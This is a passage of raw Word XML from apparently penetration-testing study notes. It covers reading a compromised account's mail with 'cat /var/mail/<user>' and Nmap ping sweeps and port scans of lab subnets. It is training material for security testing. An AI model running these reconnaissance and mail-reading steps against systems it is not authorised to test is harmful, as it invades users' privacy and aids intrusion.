          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/spool/mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId853">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Scrutiny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28C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" when you SSH into an account, here's what to do.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try using the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" command which will list of mail messages for the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /var/mail/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">marcus</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1475"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "marcus" with the user you are SSH'd into</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C8">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and just look around</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028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8CD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wx5mrasxotvy" w:id="355"/>
      <w:bookmarkEnd w:id="355"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: After finding that a website has virtual hosting, add to /etc/hosts and then RUN NMAP AGAIN with the IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP NSE scripts can be found in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 7.3.1. NSE Vulnerability Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 12.3.3. Nmap NSE Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can scan multiple IP with one nmap command, like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sT -Pn -p 21,80,443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.6.240 172.16.6.241 172.16.6.254</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sT -Pn -p 21,80,443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.216.245-250</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how to specify a range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ping sweep (tells you what hosts are on this subnet):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.0/24 covers 192.168.1.1 through 192.168.1.254.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will tell you which hosts on your local LAN are up.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 10.0.0.1-50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only scans 10.0.0.1 through 10.0.0.50.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 172.16.5.1 172.16.5.5 172.16.5.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BE CAREFUL. As seen in the XXXXXXXXX Challenge Labs, sometimes machines have software firewalls enabled and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">may not respond to ICMP echo requests</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ping sweep (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) relies on these pings (ICMP echo requests), and so it will think that the machines are down. So, keep that in mind when doing ping sweeps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Ping (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Skip host discovery</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, before scanning, Nmap tries to check if a host is alive (using ICMP echo, TCP SYN to port 443/80, etc.). If the host doesn’t reply, Nmap marks it as "down" and skips scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With -Pn → Nmap assumes every target is up, skips host discovery, and goes straight to port scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is useful when:</w:t>
      </w:r>
    </w:p>
